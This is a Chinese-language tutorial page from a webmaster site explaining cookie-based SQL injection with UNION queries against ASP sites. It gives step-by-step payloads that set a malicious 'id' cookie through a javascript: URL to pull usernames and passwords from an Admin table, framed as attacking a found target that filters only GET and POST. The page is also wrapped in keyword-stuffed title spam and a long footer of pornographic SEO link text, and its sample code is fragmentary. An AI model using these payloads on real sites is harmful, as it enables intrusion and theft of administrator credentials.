精品免费在线观看-精品欧美-精品欧美成人bd高清在线观看-精品欧美高清不卡在线-精品欧美日韩一区二区

17站長網

17站長網 首頁 安全 安全教程 查看內容

教你學會Cookie與聯合查詢的注入

2022-9-24 10:23| 查看: 2268 |來源: 互聯網

具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細節。隱私報告里設置處需要接受所有的cookie將安全降低。 具體 ...

具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細節。隱私報告里設置處需要接受所有的cookie將安全降低。

具體的原理與分析過程我就不寫了,寫起來一大片,大家看的心煩我寫的頭痛,我就講操作過程中的細節。隱私報告里設置處需要接受所有的cookie將安全降低。

cookie值是連接后才保存到本機的,也就是關IE后.

前提條件:一、網站沒有過濾cookie方式的注入。

二、需事前了解數據庫的管理員表段名,計算一下注入文件數據庫查詢語句在數據庫中的列數。

打開數據庫,找到Product這個表名,計算字段數為21個。管理員表名為admin 用戶與密碼字段名為username、password,呵呵沒有注入文件,我們可以自己構造一個測試方便大家的理解。

構造如下簡單注入ASP,當然我沒作什么嚴格的過濾,也就是接受任何方式的提交。.

//調用數據庫連接文件

")

else

%>

//反回指針處的內容,選取的字段與管理員的用戶密碼類型要相同

找前圖中的ID=55

構造聯合查詢語句

and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin 將6,2分別用username、password替換

來試試cookie注入。找個目標,注入點結構與前面相近就不再分析了,僅過濾了post與get注入.

步驟一:重新打開IE,先連接到需注入的網站http://127.0.0.1/nf,也就是去除前面的鏈接值。注意:不要直接在前面圖中的鏈接處操作,可以會不成功噢。

步驟二:清空地址處IE,再次在地址中加入如下

javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,

2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))

再次清空IE打入http://127.0.0.1/nf/ProductShow.asp

步驟四:重復步驟一.注意此步驟必需操作,很多人失敗就在這里。

步驟五:清空地址處IE,再次在地址中如下代碼

javascript:alert(document.cookie="id=" escape("56 and 1=2 union select 1,

username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from Admin"))

步驟六、再次清空地址處IE。http://127.0.0.1/nf/ProductShow.asp

好了全文結束。

本文最后更新于 2022-9-24 10:23,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        主站蜘蛛池模板: 欧美三级一区二区 | 日韩欧美国产一区二区三区四区 | 国产v在线在线观看羞羞答答 | 欧美日韩不卡中文字幕在线 | 成人av手机在线观看 | 国产婷婷色综合成人精品 | 一区二区视频在线观看免费的 | 1000部未满岁18在线观看网站 | 色老成人精品视频在线观看 | 1024国产| 免看一级a毛片一片成人不卡 | 欧美一级毛片美99毛片 | 国产成人爱情动作片在线观看 | 人人综合 | 国产又黄不爽不遮挡视频 | 免费簧网站永久在线播放国产 | 最新国产美女一区二区三区 | 国产精品91在线播放 | 色天天综合 | 亚洲精品 国产 日韩 | 三级免费黄色片 | 美国黄色免费网站 | 日本免费va毛片在线看大 | 国语对白清晰好大好白 | 91久久| 亚洲欧美在线观看 | 青草国产 | 国产亚洲精品久久久久久午夜 | 成人性生交大片免费看4 | 一级毛片在播放免费 | 高清国产一区二区三区 | 亚洲精品久中文字幕 | 久久久亚洲欧洲日产国码二区 | 黄色网一级片 | 美女久久久久久 | 国产精品无码2021在线观看 | 免费一级特黄特色大片在线观看看 | 国内精品视频一区 | 欧美一级黄色录像 | 久草在线精品 | 日韩欧美综合在线二区三区 |